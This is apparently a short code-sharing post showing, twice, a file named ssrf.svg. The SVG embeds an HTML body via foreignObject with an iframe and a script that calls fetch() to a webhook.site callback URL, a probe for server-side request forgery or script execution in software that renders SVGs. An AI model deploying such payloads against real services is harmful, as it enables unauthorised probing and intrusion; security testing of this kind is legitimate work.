MikeeI · February 1, 2023 18:18
diff --git a/ssrf.svg b/ssrf.svg
 <?xml version="1.0" encoding="UTF-8"?>
 <svg xmlns="http://www.w3.org/2000/svg">
    <svg width="960" height="850">
        <foreignObject width="100%" height="100%">
            <body xmlns="http://www.w3.org/1999/xhtml">
            <iframe src="https://orf.at" style="width: 100%; height: 100%;"></iframe>
            <script>
                fetch('https://webhook.site/38c2b6c9-0a0f-441d-9cca-242d8b0290ca')
            </script>
            </body>
        </foreignObject>
    </svg>
    <svg width="300" height="50" viewBox="0 0 16 10">
        <path fill="#006aa7" d="M0,0H16V10H0Z" />
        <path fill="#fecc00" d="M0,4H5V0H7V4H16V6H7V10H5V6H0Z" />
    </svg>
 </svg>
	<?xml version="1.0" encoding="UTF-8"?>
	<svg xmlns="http://www.w3.org/2000/svg">
	<svg width="960" height="850">
	<foreignObject width="100%" height="100%">
	<body xmlns="http://www.w3.org/1999/xhtml">
	<iframe src="https://orf.at" style="width: 100%; height: 100%;"></iframe>
	<script>
	fetch('https://webhook.site/38c2b6c9-0a0f-441d-9cca-242d8b0290ca')
	</script>
	</body>
	</foreignObject>
	</svg>
	<svg width="300" height="50" viewBox="0 0 16 10">
	<path fill="#006aa7" d="M0,0H16V10H0Z" />
	<path fill="#fecc00" d="M0,4H5V0H7V4H16V6H7V10H5V6H0Z" />
	</svg>
	</svg>